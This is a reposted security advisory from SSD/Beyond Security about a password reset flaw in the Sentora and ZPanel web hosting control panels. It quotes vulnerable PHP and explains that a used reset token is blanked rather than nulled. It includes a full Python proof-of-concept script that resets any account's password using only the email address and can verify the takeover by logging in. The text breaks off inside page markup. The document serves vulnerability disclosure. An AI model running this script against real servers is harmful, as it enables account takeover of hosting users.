{"id":9485,"date":"2017-09-24T14:19:18","date_gmt":"2017-09-24T22:19:18","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/09\/24\/news-3258\/"},"modified":"2017-09-24T14:19:18","modified_gmt":"2017-09-24T22:19:18","slug":"news-3258","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/09\/24\/news-3258\/","title":{"rendered":"SSD Advisory \u2013 Sentora \/ ZPanel Password Reset Vulnerability"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 24 Sep 2017 07:58:32 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3386\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3386');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a password reset found in Sentora \/ ZPanel.<\/p>\n<p>Sentora is &#8220;a free to download and use web hosting control panel developed for Linux, UNIX and BSD based servers or computers. The Sentora software can turn a domestic or commercial server into a fully fledged, easy to use and manage web hosting server&#8221;.<\/p>\n<p>ZPanel is a free to download and use Web hosting control panel written to work effortlessly with Microsoft Windows and POSIX (Linux, UNIX and MacOSX) based servers or computers. This solution can turn a home or professional server into a fully fledged, easy to use and manage web hosting server.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Hostwinds was informed of the vulnerability, to which they response with &#8220;Zpanel is owned by Hostwinds but is no longer in production and has not been supported for some time now. We only keep it active as a legacy control panel and strongly discourage clients from using it. If you would like to continue to use it that is agreeable, but we are not able to offer any kind of support for it other than installing a different control panel over it.&#8221;<\/p>\n<p>Sentora was informed of the vulnerability on July 16 2017, while acknowledging the receipt of the vulnerability information, they failed to respond to the technical claims, provide a fix timeline or coordinate an advisory with us.<\/p>\n<p><span id=\"more-3386\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> A design flaw in the way Sentora \/ ZPanel validate reset token allows an attacker to reset the victims password.<\/p>\n<p>The handler of &#8220;forgot password&#8221; functionality is:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59c82f65ac98a629152588\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [ sentora\/inc\/init.inc.php ]        43\tif (isset($_POST[&#8216;inForgotPassword&#8217;])) {      44\t    runtime_csfr::Protect();      45\t    $randomkey = runtime_randomstring::randomHash();     &#8230;      53\t        $zdbh-&gt;exec(&#8220;UPDATE x_accounts SET ac_resethash_tx = &#8216;&#8221; . $randomkey . &#8220;&#8216; WHERE ac_id_pk=&#8221; . $result[&#8216;ac_id_pk&#8217;] . &#8220;&#8221;);     &#8230;      68\t        $phpmailer-&gt;Body = &#8220;Hi &#8221; . $result[&#8216;ac_user_vc&#8217;] . &#8220;,      69\t                  70\tYou, or somebody pretending to be you, has requested a password reset link to be sent for your web hosting control panel login.      71\t              72\tIf you wish to proceed with the password reset on your account, please use the link below to be taken to the password reset page.      73\t                  74\t&#8221; . $protocol . $domain . &#8220;\/?resetkey=&#8221; . $randomkey . &#8221;      75\t      76\t      77\t                &#8220;;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<p>It generates reset token <em>&#8216;ac_resethash_tx&#8217;<\/em> and sends an email with reset link to the user.<\/p>\n<p>Then user returns via this link and fills the reset form:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59c82f65ac995322083492\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [ sentora\/inc\/init.inc.php ]        84\tif (isset($_POST[&#8216;inConfEmail&#8217;])) {     &#8230;      86\t    $sql = $zdbh-&gt;prepare(&#8220;SELECT ac_id_pk FROM x_accounts WHERE ac_email_vc = :email AND ac_resethash_tx = :resetkey AND ac_resethash_tx IS NOT NULL AND ac_deleted_ts IS NULL&#8221;);     &#8230;      93\t    $crypto-&gt;SetPassword($_POST[&#8216;inNewPass&#8217;]);     &#8230;      99\t        $sql = $zdbh-&gt;prepare(&#8220;UPDATE x_accounts SET ac_resethash_tx = &#8221;, ac_pass_vc = :password, ac_passsalt_vc = :salt WHERE ac_id_pk = :uid&#8221;);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac995322083492-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac995322083492-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac995322083492-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac995322083492-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac995322083492-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac995322083492-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac995322083492-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac995322083492-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac995322083492-9\">9<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac995322083492-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sentora<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">inc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">init<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">inc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">php<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac995322083492-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac995322083492-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">84<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">isset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_POST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;inConfEmail&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac995322083492-4\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac995322083492-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">86<\/span><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">sql<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">zdbh<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">prepare<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;SELECT ac_id_pk FROM x_accounts WHERE ac_email_vc = :email AND ac_resethash_tx = :resetkey AND ac_resethash_tx IS NOT NULL AND ac_deleted_ts IS NULL&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac995322083492-6\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac995322083492-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">93<\/span><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">crypto<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">SetPassword<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_POST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;inNewPass&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac995322083492-8\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac995322083492-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">99<\/span><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">sql<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">zdbh<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">prepare<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;UPDATE x_accounts SET ac_resethash_tx = &#8221;, ac_pass_vc = :password, ac_passsalt_vc = :salt WHERE ac_id_pk = :uid&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0013 seconds] -->  <\/p>\n<p>Reset token is checked and if it matches the password it is set to requested new password and reset token is invalidated.<\/p>\n<p>The problem is that while invalidating the token it is not set to <em>NULL<\/em> as it should be, but instead it is set to empty string.<\/p>\n<p>This means that if user used password reset, anyone can reset his password again with empty token. We only need to know his email adress which is only used to identify the user, no email is sent to that address.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Usage:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59c82f65ac998767877559\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> resetagain.py http:\/\/target\/ email newpassword [username]<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac998767877559-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac998767877559-1\"><span class=\"crayon-v\">resetagain<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">py <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/target\/ email newpassword [username]<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59c82f65ac99b844907907\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python3  # pylint: disable=C0103  #  # requires requests and lxml library  # pip3 install requests lxml  #  import sys  from urllib.parse import urljoin  import lxml.html  import requests    try:      requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)  except:      pass    if len(sys.argv) &lt; 4:      print(&#8220;&#8221;)      print(&#8220;usage:&#8221;)      print(&#8220;%s http:\/\/target\/ email newpassword [username]&#8221; % sys.argv[0])      print(&#8220;&#8221;)      print(&#8220;If username is specified then login will be attempted to verify password change.&#8221;)      print(&#8220;&#8221;)      sys.exit()    TARGET = sys.argv[1]  USER_EMAIL = sys.argv[2]  USER_NEWPASS = sys.argv[3]  USER_NAME = sys.argv[4] if len(sys.argv) &gt; 4 else &#8220;&#8221;      def get_form(getpath, formname, params=None):      resp = session.get(urljoin(TARGET, getpath), params=params)      tree = lxml.html.fromstring(resp.content)      form = tree.xpath(&#8216;\/\/form[@name=&#8221;%s&#8221;]&#8217; % formname)      if not form:          return None      form = form[0]      formdata = {}      for element in form.xpath(&#8216;.\/\/input&#8217;):          formdata[element.name] = element.value if element.value else &#8220;&#8221;      return (form.action, formdata)      def post_form(formaction, data, params=None):      return session.post(urljoin(TARGET, formaction), params=params, data=data, allow_redirects=False)      session = requests.Session()  session.verify = False    print(&#8220;Get reset form&#8221;)  form = get_form(&#8220;\/&#8221;, &#8220;frmZConfirm&#8221;, {&#8220;resetkey&#8221;: &#8220;dummy&#8221;})    print(&#8220;Reset password&#8221;)  formaction, formdata = form  formdata[&#8220;inConfEmail&#8221;] = USER_EMAIL  formdata[&#8220;inNewPass&#8221;] = formdata[&#8220;inputNewPass2&#8221;] = USER_NEWPASS  resp = post_form(formaction, formdata, {&#8220;resetkey&#8221;: &#8220;&#8221;})    if USER_NAME:      #session.cookies.clear()      print(&#8220;Test login&#8221;)      print(&#8220;Get login form&#8221;)      form = get_form(&#8220;\/&#8221;, &#8220;frmZLogin&#8221;)        print(&#8220;Login&#8221;)      formaction, formdata = form      formdata[&#8220;inUsername&#8221;] = USER_NAME      formdata[&#8220;inPassword&#8221;] = USER_NEWPASS      resp = post_form(formaction, formdata)      if &#8220;invalidlogin&#8221; in resp.headers.get(&#8220;location&#8221;, &#8220;&#8221;):          print(&#8220;Failed!&#8221;)          sys.exit()      print(&#8220;OK&#8221;)      session.get(urljoin(TARGET, &#8220;\/?logout&#8221;))<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-70\">70<\/div>\n<div class=\"crayon-num\" 